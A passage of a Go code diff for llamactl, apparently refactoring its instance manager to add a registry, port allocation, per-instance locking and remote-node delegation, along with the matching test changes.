Model: "/path/to/model.gguf",
},
},
}
instanceName := fmt.Sprintf("concurrent-test-%d", index)
@@ -146,7 +113,7 @@ func TestConcurrentAccess(t *testing.T) {
}
// Concurrent list operations
for i := 0; i < 3; i++ {
for range 3 {
wg.Add(1)
go func() {
defer wg.Done()
@@ -165,47 +132,39 @@ func TestConcurrentAccess(t *testing.T) {
}
}
func TestShutdown(t *testing.T) {
mgr := createTestManager()
// Create test instance
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
// Helper functions for test configuration
func createTestAppConfig(instancesDir string) *config.AppConfig {
// Use 'sh -c "sleep 999999"' as a test command instead of 'llama-server'
// The shell ignores all additional arguments passed after the command
return &config.AppConfig{
Backends: config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "sh",
Args: []string{"-c", "sleep 999999"},
},
MLX: config.BackendSettings{
Command: "sh",
Args: []string{"-c", "sleep 999999"},
},
},
Instances: config.InstancesConfig{
PortRange: [2]int{8000, 9000},
InstancesDir: instancesDir,
LogsDir: instancesDir,
MaxInstances: 10,
MaxRunningInstances: 10,
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
TimeoutCheckInterval: 5,
},
LocalNode: "main",
Nodes: map[string]config.NodeConfig{},
}
_, err := mgr.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Shutdown should not panic
mgr.Shutdown()
// Multiple shutdowns should not panic
mgr.Shutdown()
}
// Helper function to create a test manager with standard config
func createTestManager() manager.InstanceManager {
backendConfig := config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
},
}
cfg := config.InstancesConfig{
PortRange: [2]int{8000, 9000},
LogsDir: "/tmp/test",
MaxInstances: 10,
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
TimeoutCheckInterval: 5,
}
return manager.NewInstanceManager(backendConfig, cfg)
// createTestManager builds a manager from the standard test configuration,
// using a fresh per-test temporary directory (t.TempDir) as the directory
// passed to createTestAppConfig.
func createTestManager(t *testing.T) manager.InstanceManager {
	return manager.New(createTestAppConfig(t.TempDir()))
}

View File

@@ -1,159 +1,351 @@
package manager
import (
"context"
"fmt"
"llamactl/pkg/backends"
"llamactl/pkg/instance"
"llamactl/pkg/validation"
"os"
"path/filepath"
"log"
)
// MaxRunningInstancesError is the error type StartInstance uses to wrap the
// "maximum number of running instances reached" failure.
// NOTE(review): because the underlying type is the error interface, this is
// itself an interface type with the same method set as error; a type assertion
// or errors.As against it will presumably match any error value, not only the
// limit error — confirm how callers distinguish it.
type MaxRunningInstancesError error
// ListInstances returns a list of all instances managed by the instance manager.
func (im *instanceManager) ListInstances() ([]*instance.Process, error) {
im.mu.RLock()
defer im.mu.RUnlock()
instances := make([]*instance.Process, 0, len(im.instances))
for _, inst := range im.instances {
instances = append(instances, inst)
// updateLocalInstanceFromRemote copies the state reported by a remote instance
// onto the local stub that tracks it: options, status and creation timestamp.
// Nothing is changed when either instance is nil or when the remote instance
// carries no options.
func (im *instanceManager) updateLocalInstanceFromRemote(localInst *instance.Instance, remoteInst *instance.Instance) {
	if localInst == nil || remoteInst == nil {
		return
	}

	if opts := remoteInst.GetOptions(); opts != nil {
		// Mirror the remote data onto the local stub.
		localInst.SetOptions(opts)
		localInst.SetStatus(remoteInst.GetStatus())
		localInst.Created = remoteInst.Created
	}
}
// ListInstances returns a list of all instances managed by the instance manager.
// For remote instances, this fetches the live state from remote nodes and
// updates the local stubs in place before returning them.
//
// A failure to reach one remote node does not fail the whole listing: the
// error is logged and the (possibly stale) local stub is returned for that
// instance. The returned error is currently always nil.
func (im *instanceManager) ListInstances() ([]*instance.Instance, error) {
	instances := im.registry.list()

	// Update remote instances with live state
	ctx := context.Background()
	for _, inst := range instances {
		node := im.getNodeForInstance(inst)
		if node == nil {
			// Local instance (or no node mapping): nothing to refresh.
			continue
		}

		remoteInst, err := im.remote.getInstance(ctx, node, inst.Name)
		if err != nil {
			// Log the error but continue with stale data; one unreachable
			// remote must not break the entire list operation.
			log.Printf("Failed to fetch remote instance %s, using stale data: %v", inst.Name, err)
			continue
		}

		// Update the local stub with the data reported by the remote node
		im.updateLocalInstanceFromRemote(inst, remoteInst)
	}

	return instances, nil
}
// CreateInstance creates a new instance with the given options and returns it.
// The instance is initially in a "stopped" state.
func (im *instanceManager) CreateInstance(name string, options *instance.CreateInstanceOptions) (*instance.Process, error) {
func (im *instanceManager) CreateInstance(name string, options *instance.Options) (*instance.Instance, error) {
if options == nil {
return nil, fmt.Errorf("instance options cannot be nil")
}
name, err := validation.ValidateInstanceName(name)
err := options.BackendOptions.ValidateInstanceOptions()
if err != nil {
return nil, err
}
err = validation.ValidateInstanceOptions(options)
if err != nil {
return nil, err
}
im.mu.Lock()
defer im.mu.Unlock()
// Check max instances limit after acquiring the lock
if len(im.instances) >= im.instancesConfig.MaxInstances && im.instancesConfig.MaxInstances != -1 {
return nil, fmt.Errorf("maximum number of instances (%d) reached", im.instancesConfig.MaxInstances)
}
// Check if instance with this name already exists
if im.instances[name] != nil {
// Check if instance with this name already exists (must be globally unique)
if _, exists := im.registry.get(name); exists {
return nil, fmt.Errorf("instance with name %s already exists", name)
}
// Assign and validate port for backend-specific options
if err := im.assignAndValidatePort(options); err != nil {
return nil, err
// Check if this is a remote instance (local node not in the Nodes set)
if _, isLocal := options.Nodes[im.globalConfig.LocalNode]; !isLocal && len(options.Nodes) > 0 {
// Get the first node from the set
var nodeName string
for node := range options.Nodes {
nodeName = node
break
}
// Create the remote instance on the remote node
ctx := context.Background()
nodeConfig, exists := im.remote.getNodeForInstance(nodeName)
if !exists {
// Try to set the node if it doesn't exist yet
if err := im.remote.setInstanceNode(name, nodeName); err != nil {
return nil, fmt.Errorf("node %s not found", nodeName)
}
nodeConfig, _ = im.remote.getNodeForInstance(name)
}
remoteInst, err := im.remote.createInstance(ctx, nodeConfig, name, options)
if err != nil {
return nil, err
}
// Create a local stub that preserves the Nodes field for tracking
// We keep the original options (with Nodes) so IsRemote() works correctly
inst := instance.New(name, im.globalConfig, options, nil)
// Update the local stub with all remote data (preserving Nodes)
im.updateLocalInstanceFromRemote(inst, remoteInst)
// Map instance to node
if err := im.remote.setInstanceNode(name, nodeName); err != nil {
return nil, fmt.Errorf("failed to map instance to node: %w", err)
}
// Add to registry (doesn't count towards local limits)
if err := im.registry.add(inst); err != nil {
return nil, fmt.Errorf("failed to add instance to registry: %w", err)
}
// Persist the remote instance locally for tracking across restarts
if err := im.persistInstance(inst); err != nil {
// Rollback: remove from registry
im.registry.remove(name)
return nil, fmt.Errorf("failed to persist remote instance %s: %w", name, err)
}
return inst, nil
}
statusCallback := func(oldStatus, newStatus instance.InstanceStatus) {
// Local instance creation
// Check max instances limit for local instances only
totalInstances := im.registry.count()
remoteCount := 0
for _, inst := range im.registry.list() {
if inst.IsRemote() {
remoteCount++
}
}
localInstanceCount := totalInstances - remoteCount
if localInstanceCount >= im.globalConfig.Instances.MaxInstances && im.globalConfig.Instances.MaxInstances != -1 {
return nil, fmt.Errorf("maximum number of instances (%d) reached", im.globalConfig.Instances.MaxInstances)
}
// Assign and validate port for backend-specific options
currentPort := im.getPortFromOptions(options)
var allocatedPort int
if currentPort == 0 {
// Allocate a port if not specified
allocatedPort, err = im.ports.allocate(name)
if err != nil {
return nil, fmt.Errorf("failed to allocate port: %w", err)
}
im.setPortInOptions(options, allocatedPort)
} else {
// Use the specified port
if err := im.ports.allocateSpecific(currentPort, name); err != nil {
return nil, fmt.Errorf("port %d is already in use: %w", currentPort, err)
}
allocatedPort = currentPort
}
statusCallback := func(oldStatus, newStatus instance.Status) {
im.onStatusChange(name, oldStatus, newStatus)
}
inst := instance.NewInstance(name, &im.backendsConfig, &im.instancesConfig, options, statusCallback)
im.instances[inst.Name] = inst
inst := instance.New(name, im.globalConfig, options, statusCallback)
// Add to registry
if err := im.registry.add(inst); err != nil {
// Rollback: release port
im.ports.release(allocatedPort)
return nil, fmt.Errorf("failed to add instance to registry: %w", err)
}
// Persist instance (best-effort, don't fail if persistence fails)
if err := im.persistInstance(inst); err != nil {
return nil, fmt.Errorf("failed to persist instance %s: %w", name, err)
log.Printf("Warning: failed to persist instance %s: %v", name, err)
}
return inst, nil
}
// GetInstance retrieves an instance by its name.
func (im *instanceManager) GetInstance(name string) (*instance.Process, error) {
im.mu.RLock()
defer im.mu.RUnlock()
instance, exists := im.instances[name]
// For remote instances, this fetches the live state from the remote node and updates the local stub.
func (im *instanceManager) GetInstance(name string) (*instance.Instance, error) {
inst, exists := im.registry.get(name)
if !exists {
return nil, fmt.Errorf("instance with name %s not found", name)
}
return instance, nil
// Check if instance is remote and fetch live state
if node := im.getNodeForInstance(inst); node != nil {
ctx := context.Background()
remoteInst, err := im.remote.getInstance(ctx, node, name)
if err != nil {
return nil, err
}
// Update the local stub with all remote data (preserving Nodes)
im.updateLocalInstanceFromRemote(inst, remoteInst)
// Return the local stub (preserving Nodes field)
return inst, nil
}
return inst, nil
}
// UpdateInstance updates the options of an existing instance and returns it.
// If the instance is running, it will be restarted to apply the new options.
func (im *instanceManager) UpdateInstance(name string, options *instance.CreateInstanceOptions) (*instance.Process, error) {
im.mu.RLock()
instance, exists := im.instances[name]
im.mu.RUnlock()
func (im *instanceManager) UpdateInstance(name string, options *instance.Options) (*instance.Instance, error) {
inst, exists := im.registry.get(name)
if !exists {
return nil, fmt.Errorf("instance with name %s not found", name)
}
// Check if instance is remote and delegate to remote operation
if node := im.getNodeForInstance(inst); node != nil {
ctx := context.Background()
remoteInst, err := im.remote.updateInstance(ctx, node, name, options)
if err != nil {
return nil, err
}
// Update the local stub with all remote data (preserving Nodes)
im.updateLocalInstanceFromRemote(inst, remoteInst)
// Persist the updated remote instance locally
if err := im.persistInstance(inst); err != nil {
return nil, fmt.Errorf("failed to persist updated remote instance %s: %w", name, err)
}
return inst, nil
}
if options == nil {
return nil, fmt.Errorf("instance options cannot be nil")
}
err := validation.ValidateInstanceOptions(options)
err := options.BackendOptions.ValidateInstanceOptions()
if err != nil {
return nil, err
}
// Lock this specific instance only
lock := im.lockInstance(name)
lock.Lock()
defer lock.Unlock()
// Handle port changes
oldPort := inst.GetPort()
newPort := im.getPortFromOptions(options)
var allocatedPort int
if newPort != oldPort {
// Port is changing - need to release old and allocate new
if newPort == 0 {
// Auto-allocate new port
allocatedPort, err = im.ports.allocate(name)
if err != nil {
return nil, fmt.Errorf("failed to allocate new port: %w", err)
}
im.setPortInOptions(options, allocatedPort)
} else {
// Use specified port
if err := im.ports.allocateSpecific(newPort, name); err != nil {
return nil, fmt.Errorf("failed to allocate port %d: %w", newPort, err)
}
allocatedPort = newPort
}
// Release old port
if oldPort > 0 {
if err := im.ports.release(oldPort); err != nil {
// Rollback new port allocation
im.ports.release(allocatedPort)
return nil, fmt.Errorf("failed to release old port %d: %w", oldPort, err)
}
}
}
// Check if instance is running before updating options
wasRunning := instance.IsRunning()
wasRunning := inst.IsRunning()
// If the instance is running, stop it first
if wasRunning {
if err := instance.Stop(); err != nil {
if err := inst.Stop(); err != nil {
return nil, fmt.Errorf("failed to stop instance %s for update: %w", name, err)
}
}
// Now update the options while the instance is stopped
instance.SetOptions(options)
inst.SetOptions(options)
// If it was running before, start it again with the new options
if wasRunning {
if err := instance.Start(); err != nil {
if err := inst.Start(); err != nil {
return nil, fmt.Errorf("failed to start instance %s after update: %w", name, err)
}
}
im.mu.Lock()
defer im.mu.Unlock()
if err := im.persistInstance(instance); err != nil {
if err := im.persistInstance(inst); err != nil {
return nil, fmt.Errorf("failed to persist updated instance %s: %w", name, err)
}
return instance, nil
return inst, nil
}
// DeleteInstance removes stopped instance by its name.
func (im *instanceManager) DeleteInstance(name string) error {
im.mu.Lock()
defer im.mu.Unlock()
instance, exists := im.instances[name]
inst, exists := im.registry.get(name)
if !exists {
return fmt.Errorf("instance with name %s not found", name)
}
if instance.IsRunning() {
// Check if instance is remote and delegate to remote operation
if node := im.getNodeForInstance(inst); node != nil {
ctx := context.Background()
err := im.remote.deleteInstance(ctx, node, name)
if err != nil {
return err
}
// Clean up local tracking
im.remote.removeInstance(name)
im.registry.remove(name)
// Delete the instance's persistence file
if err := im.persistence.delete(name); err != nil {
return fmt.Errorf("failed to delete config file for remote instance %s: %w", name, err)
}
return nil
}
// Lock this specific instance and clean up the lock on completion
lock := im.lockInstance(name)
lock.Lock()
defer im.unlockAndCleanup(name)
status := inst.GetStatus()
if status == instance.Running || status == instance.Restarting {
return fmt.Errorf("instance with name %s is still running, stop it before deleting", name)
}
delete(im.ports, instance.GetPort())
delete(im.instances, name)
// Release port (use ReleaseByInstance for proper cleanup)
im.ports.releaseByInstance(name)
// Delete the instance's config file if persistence is enabled
instancePath := filepath.Join(im.instancesConfig.InstancesDir, instance.Name+".json")
if err := os.Remove(instancePath); err != nil && !os.IsNotExist(err) {
return fmt.Errorf("failed to delete config file for instance %s: %w", instance.Name, err)
// Remove from registry
if err := im.registry.remove(name); err != nil {
return fmt.Errorf("failed to remove instance from registry: %w", err)
}
// Delete persistence file
if err := im.persistence.delete(name); err != nil {
return fmt.Errorf("failed to delete config file for instance %s: %w", name, err)
}
return nil
@@ -161,156 +353,186 @@ func (im *instanceManager) DeleteInstance(name string) error {
// StartInstance starts a stopped instance and returns it.
// If the instance is already running, it returns an error.
func (im *instanceManager) StartInstance(name string) (*instance.Process, error) {
im.mu.RLock()
instance, exists := im.instances[name]
maxRunningExceeded := len(im.runningInstances) >= im.instancesConfig.MaxRunningInstances && im.instancesConfig.MaxRunningInstances != -1
im.mu.RUnlock()
func (im *instanceManager) StartInstance(name string) (*instance.Instance, error) {
inst, exists := im.registry.get(name)
if !exists {
return nil, fmt.Errorf("instance with name %s not found", name)
}
if instance.IsRunning() {
return instance, fmt.Errorf("instance with name %s is already running", name)
// Check if instance is remote and delegate to remote operation
if node := im.getNodeForInstance(inst); node != nil {
ctx := context.Background()
remoteInst, err := im.remote.startInstance(ctx, node, name)
if err != nil {
return nil, err
}
// Update the local stub with all remote data (preserving Nodes)
im.updateLocalInstanceFromRemote(inst, remoteInst)
return inst, nil
}
if maxRunningExceeded {
return nil, MaxRunningInstancesError(fmt.Errorf("maximum number of running instances (%d) reached", im.instancesConfig.MaxRunningInstances))
// Lock this specific instance only
lock := im.lockInstance(name)
lock.Lock()
defer lock.Unlock()
// Idempotent: if already running, just return success
if inst.IsRunning() {
return inst, nil
}
if err := instance.Start(); err != nil {
// Check max running instances limit for local instances only
if im.IsMaxRunningInstancesReached() {
return nil, MaxRunningInstancesError(fmt.Errorf("maximum number of running instances (%d) reached", im.globalConfig.Instances.MaxRunningInstances))
}
if err := inst.Start(); err != nil {
return nil, fmt.Errorf("failed to start instance %s: %w", name, err)
}
im.mu.Lock()
defer im.mu.Unlock()
err := im.persistInstance(instance)
if err != nil {
return nil, fmt.Errorf("failed to persist instance %s: %w", name, err)
// Persist instance (best-effort, don't fail if persistence fails)
if err := im.persistInstance(inst); err != nil {
log.Printf("Warning: failed to persist instance %s: %v", name, err)
}
return instance, nil
return inst, nil
}
func (im *instanceManager) IsMaxRunningInstancesReached() bool {
im.mu.RLock()
defer im.mu.RUnlock()
if im.instancesConfig.MaxRunningInstances != -1 && len(im.runningInstances) >= im.instancesConfig.MaxRunningInstances {
return true
if im.globalConfig.Instances.MaxRunningInstances == -1 {
return false
}
return false
// Count only local running instances (each node has its own limits)
localRunningCount := 0
for _, inst := range im.registry.listRunning() {
if !inst.IsRemote() {
localRunningCount++
}
}
return localRunningCount >= im.globalConfig.Instances.MaxRunningInstances
}
// StopInstance stops a running instance and returns it.
func (im *instanceManager) StopInstance(name string) (*instance.Process, error) {
im.mu.RLock()
instance, exists := im.instances[name]
im.mu.RUnlock()
func (im *instanceManager) StopInstance(name string) (*instance.Instance, error) {
inst, exists := im.registry.get(name)
if !exists {
return nil, fmt.Errorf("instance with name %s not found", name)
}
if !instance.IsRunning() {
return instance, fmt.Errorf("instance with name %s is already stopped", name)
// Check if instance is remote and delegate to remote operation
if node := im.getNodeForInstance(inst); node != nil {
ctx := context.Background()
remoteInst, err := im.remote.stopInstance(ctx, node, name)
if err != nil {
return nil, err
}
// Update the local stub with all remote data (preserving Nodes)
im.updateLocalInstanceFromRemote(inst, remoteInst)
return inst, nil
}
if err := instance.Stop(); err != nil {
// Lock this specific instance only
lock := im.lockInstance(name)
lock.Lock()
defer lock.Unlock()
// Idempotent: if already stopped, just return success
if !inst.IsRunning() {
return inst, nil
}
if err := inst.Stop(); err != nil {
return nil, fmt.Errorf("failed to stop instance %s: %w", name, err)
}
im.mu.Lock()
defer im.mu.Unlock()
err := im.persistInstance(instance)
if err != nil {
return nil, fmt.Errorf("failed to persist instance %s: %w", name, err)
// Persist instance (best-effort, don't fail if persistence fails)
if err := im.persistInstance(inst); err != nil {
log.Printf("Warning: failed to persist instance %s: %v", name, err)
}
return instance, nil
return inst, nil
}
// RestartInstance stops and then starts an instance, returning the updated instance.
func (im *instanceManager) RestartInstance(name string) (*instance.Process, error) {
instance, err := im.StopInstance(name)
if err != nil {
return nil, err
func (im *instanceManager) RestartInstance(name string) (*instance.Instance, error) {
inst, exists := im.registry.get(name)
if !exists {
return nil, fmt.Errorf("instance with name %s not found", name)
}
return im.StartInstance(instance.Name)
// Check if instance is remote and delegate to remote operation
if node := im.getNodeForInstance(inst); node != nil {
ctx := context.Background()
remoteInst, err := im.remote.restartInstance(ctx, node, name)
if err != nil {
return nil, err
}
// Update the local stub with all remote data (preserving Nodes)
im.updateLocalInstanceFromRemote(inst, remoteInst)
return inst, nil
}
// Lock this specific instance for the entire restart operation to ensure atomicity
lock := im.lockInstance(name)
lock.Lock()
defer lock.Unlock()
// Stop the instance
if inst.IsRunning() {
if err := inst.Stop(); err != nil {
return nil, fmt.Errorf("failed to stop instance %s: %w", name, err)
}
}
// Start the instance
if err := inst.Start(); err != nil {
return nil, fmt.Errorf("failed to start instance %s: %w", name, err)
}
// Persist the restarted instance
if err := im.persistInstance(inst); err != nil {
log.Printf("Warning: failed to persist instance %s: %v", name, err)
}
return inst, nil
}
// GetInstanceLogs retrieves the logs for a specific instance by its name.
func (im *instanceManager) GetInstanceLogs(name string) (string, error) {
im.mu.RLock()
_, exists := im.instances[name]
im.mu.RUnlock()
func (im *instanceManager) GetInstanceLogs(name string, numLines int) (string, error) {
inst, exists := im.registry.get(name)
if !exists {
return "", fmt.Errorf("instance with name %s not found", name)
}
// TODO: Implement actual log retrieval logic
return fmt.Sprintf("Logs for instance %s", name), nil
// Check if instance is remote and delegate to remote operation
if node := im.getNodeForInstance(inst); node != nil {
ctx := context.Background()
return im.remote.getInstanceLogs(ctx, node, name, numLines)
}
// Get logs from the local instance
return inst.GetLogs(numLines)
}
// getPortFromOptions extracts the port from backend-specific options
func (im *instanceManager) getPortFromOptions(options *instance.CreateInstanceOptions) int {
switch options.BackendType {
case backends.BackendTypeLlamaCpp:
if options.LlamaServerOptions != nil {
return options.LlamaServerOptions.Port
}
case backends.BackendTypeMlxLm:
if options.MlxServerOptions != nil {
return options.MlxServerOptions.Port
}
case backends.BackendTypeVllm:
if options.VllmServerOptions != nil {
return options.VllmServerOptions.Port
}
}
return 0
func (im *instanceManager) getPortFromOptions(options *instance.Options) int {
return options.BackendOptions.GetPort()
}
// setPortInOptions sets the port in backend-specific options
func (im *instanceManager) setPortInOptions(options *instance.CreateInstanceOptions, port int) {
switch options.BackendType {
case backends.BackendTypeLlamaCpp:
if options.LlamaServerOptions != nil {
options.LlamaServerOptions.Port = port
}
case backends.BackendTypeMlxLm:
if options.MlxServerOptions != nil {
options.MlxServerOptions.Port = port
}
case backends.BackendTypeVllm:
if options.VllmServerOptions != nil {
options.VllmServerOptions.Port = port
}
}
func (im *instanceManager) setPortInOptions(options *instance.Options, port int) {
options.BackendOptions.SetPort(port)
}
// assignAndValidatePort assigns a port if not specified and validates it's not in use
func (im *instanceManager) assignAndValidatePort(options *instance.CreateInstanceOptions) error {
currentPort := im.getPortFromOptions(options)
if currentPort == 0 {
// Assign a port if not specified
port, err := im.getNextAvailablePort()
if err != nil {
return fmt.Errorf("failed to get next available port: %w", err)
}
im.setPortInOptions(options, port)
// Mark the port as used
im.ports[port] = true
} else {
// Validate the specified port
if _, exists := im.ports[currentPort]; exists {
return fmt.Errorf("port %d is already in use", currentPort)
}
// Mark the port as used
im.ports[currentPort] = true
}
return nil
// EvictLRUInstance finds and stops the least recently used running instance.
// The manager does no work of its own here: the call is forwarded to the
// lifecycle component's evictLRU and its error is returned unchanged.
func (im *instanceManager) EvictLRUInstance() error {
return im.lifecycle.evictLRU()
}

View File

@@ -2,7 +2,6 @@ package manager_test
import (
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/config"
"llamactl/pkg/instance"
"llamactl/pkg/manager"
@@ -10,40 +9,14 @@ import (
"testing"
)
func TestCreateInstance_Success(t *testing.T) {
manager := createTestManager()
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
inst, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
if inst.Name != "test-instance" {
t.Errorf("Expected instance name 'test-instance', got %q", inst.Name)
}
if inst.GetStatus() != instance.Stopped {
t.Error("New instance should not be running")
}
if inst.GetPort() != 8080 {
t.Errorf("Expected port 8080, got %d", inst.GetPort())
}
}
func TestCreateInstance_ValidationAndLimits(t *testing.T) {
// Test duplicate names
mngr := createTestManager()
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
func TestCreateInstance_FailsWithDuplicateName(t *testing.T) {
mngr := createTestManager(t)
options := &instance.Options{
BackendOptions: backends.Options{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &backends.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
},
}
@@ -60,24 +33,37 @@ func TestCreateInstance_ValidationAndLimits(t *testing.T) {
if !strings.Contains(err.Error(), "already exists") {
t.Errorf("Expected duplicate name error, got: %v", err)
}
}
// Test max instances limit
backendConfig := config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
func TestCreateInstance_FailsWhenMaxInstancesReached(t *testing.T) {
tempDir := t.TempDir()
appConfig := &config.AppConfig{
Backends: config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
},
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
Instances: config.InstancesConfig{
PortRange: [2]int{8000, 9000},
InstancesDir: tempDir,
MaxInstances: 1, // Very low limit for testing
TimeoutCheckInterval: 5,
},
LocalNode: "main",
Nodes: map[string]config.NodeConfig{},
}
limitedManager := manager.New(appConfig)
options := &instance.Options{
BackendOptions: backends.Options{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &backends.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
},
}
cfg := config.InstancesConfig{
PortRange: [2]int{8000, 9000},
MaxInstances: 1, // Very low limit for testing
TimeoutCheckInterval: 5,
}
limitedManager := manager.NewInstanceManager(backendConfig, cfg)
_, err = limitedManager.CreateInstance("instance1", options)
_, err := limitedManager.CreateInstance("instance1", options)
if err != nil {
t.Fatalf("CreateInstance 1 failed: %v", err)
}
@@ -92,33 +78,32 @@ func TestCreateInstance_ValidationAndLimits(t *testing.T) {
}
}
func TestPortManagement(t *testing.T) {
manager := createTestManager()
func TestCreateInstance_FailsWithPortConflict(t *testing.T) {
manager := createTestManager(t)
// Test auto port assignment
options1 := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
options1 := &instance.Options{
BackendOptions: backends.Options{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &backends.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
},
}
inst1, err := manager.CreateInstance("instance1", options1)
_, err := manager.CreateInstance("instance1", options1)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
port1 := inst1.GetPort()
if port1 < 8000 || port1 > 9000 {
t.Errorf("Expected port in range 8000-9000, got %d", port1)
}
// Test port conflict detection
options2 := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model2.gguf",
Port: port1, // Same port - should conflict
// Try to create instance with same port
options2 := &instance.Options{
BackendOptions: backends.Options{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &backends.LlamaServerOptions{
Model: "/path/to/model2.gguf",
Port: 8080, // Same port - should conflict
},
},
}
@@ -129,98 +114,21 @@ func TestPortManagement(t *testing.T) {
if !strings.Contains(err.Error(), "port") && !strings.Contains(err.Error(), "in use") {
t.Errorf("Expected port conflict error, got: %v", err)
}
// Test port release on deletion
specificPort := 8080
options3 := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: specificPort,
},
}
_, err = manager.CreateInstance("port-test", options3)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
err = manager.DeleteInstance("port-test")
if err != nil {
t.Fatalf("DeleteInstance failed: %v", err)
}
// Should be able to create new instance with same port
_, err = manager.CreateInstance("new-port-test", options3)
if err != nil {
t.Errorf("Expected to reuse port after deletion, got error: %v", err)
}
}
func TestInstanceOperations(t *testing.T) {
manager := createTestManager()
func TestInstanceOperations_FailWithNonExistentInstance(t *testing.T) {
manager := createTestManager(t)
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
options := &instance.Options{
BackendOptions: backends.Options{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &backends.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
},
}
// Create instance
created, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Get instance
retrieved, err := manager.GetInstance("test-instance")
if err != nil {
t.Fatalf("GetInstance failed: %v", err)
}
if retrieved.Name != created.Name {
t.Errorf("Expected name %q, got %q", created.Name, retrieved.Name)
}
// Update instance
newOptions := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/new-model.gguf",
Port: 8081,
},
}
updated, err := manager.UpdateInstance("test-instance", newOptions)
if err != nil {
t.Fatalf("UpdateInstance failed: %v", err)
}
if updated.GetOptions().LlamaServerOptions.Model != "/path/to/new-model.gguf" {
t.Errorf("Expected model '/path/to/new-model.gguf', got %q", updated.GetOptions().LlamaServerOptions.Model)
}
// List instances
instances, err := manager.ListInstances()
if err != nil {
t.Fatalf("ListInstances failed: %v", err)
}
if len(instances) != 1 {
t.Errorf("Expected 1 instance, got %d", len(instances))
}
// Delete instance
err = manager.DeleteInstance("test-instance")
if err != nil {
t.Fatalf("DeleteInstance failed: %v", err)
}
_, err = manager.GetInstance("test-instance")
if err == nil {
t.Error("Instance should not exist after deletion")
}
// Test operations on non-existent instances
_, err = manager.GetInstance("nonexistent")
_, err := manager.GetInstance("nonexistent")
if err == nil || !strings.Contains(err.Error(), "not found") {
t.Errorf("Expected 'not found' error, got: %v", err)
}
@@ -235,3 +143,141 @@ func TestInstanceOperations(t *testing.T) {
t.Errorf("Expected 'not found' error, got: %v", err)
}
}
// TestDeleteInstance_RunningInstanceFails checks that DeleteInstance returns
// an error for an instance whose status has been set to Running.
func TestDeleteInstance_RunningInstanceFails(t *testing.T) {
	mgr := createTestManager(t)
	defer mgr.Shutdown()

	const name = "test-instance"

	llamaOpts := &backends.LlamaServerOptions{Model: "/path/to/model.gguf"}
	options := &instance.Options{
		BackendOptions: backends.Options{
			BackendType:        backends.BackendTypeLlamaCpp,
			LlamaServerOptions: llamaOpts,
		},
	}

	inst, err := mgr.CreateInstance(name, options)
	if err != nil {
		t.Fatalf("CreateInstance failed: %v", err)
	}

	// Flip the status by hand rather than launching a process.
	inst.SetStatus(instance.Running)

	// Deleting while the status is Running must be rejected.
	if err := mgr.DeleteInstance(name); err == nil {
		t.Error("Expected error when deleting running instance")
	}
}
// TestUpdateInstance checks that updating a started instance with a new model
// leaves it running and stores the new model path in its options.
func TestUpdateInstance(t *testing.T) {
	mgr := createTestManager(t)
	defer mgr.Shutdown()

	const (
		name     = "test-instance"
		oldModel = "/path/to/model.gguf"
		newModel = "/path/to/new-model.gguf"
	)

	// optionsFor builds llama.cpp options on port 8080 for the given model.
	optionsFor := func(model string) *instance.Options {
		return &instance.Options{
			BackendOptions: backends.Options{
				BackendType: backends.BackendTypeLlamaCpp,
				LlamaServerOptions: &backends.LlamaServerOptions{
					Model: model,
					Port:  8080,
				},
			},
		}
	}

	inst, err := mgr.CreateInstance(name, optionsFor(oldModel))
	if err != nil {
		t.Fatalf("CreateInstance failed: %v", err)
	}

	// Start the instance so the update below operates on a running one.
	if err := inst.Start(); err != nil {
		t.Fatalf("Failed to start instance: %v", err)
	}

	updated, err := mgr.UpdateInstance(name, optionsFor(newModel))
	if err != nil {
		t.Fatalf("UpdateInstance failed: %v", err)
	}

	// It was running before the update, so it should be running afterwards.
	if !updated.IsRunning() {
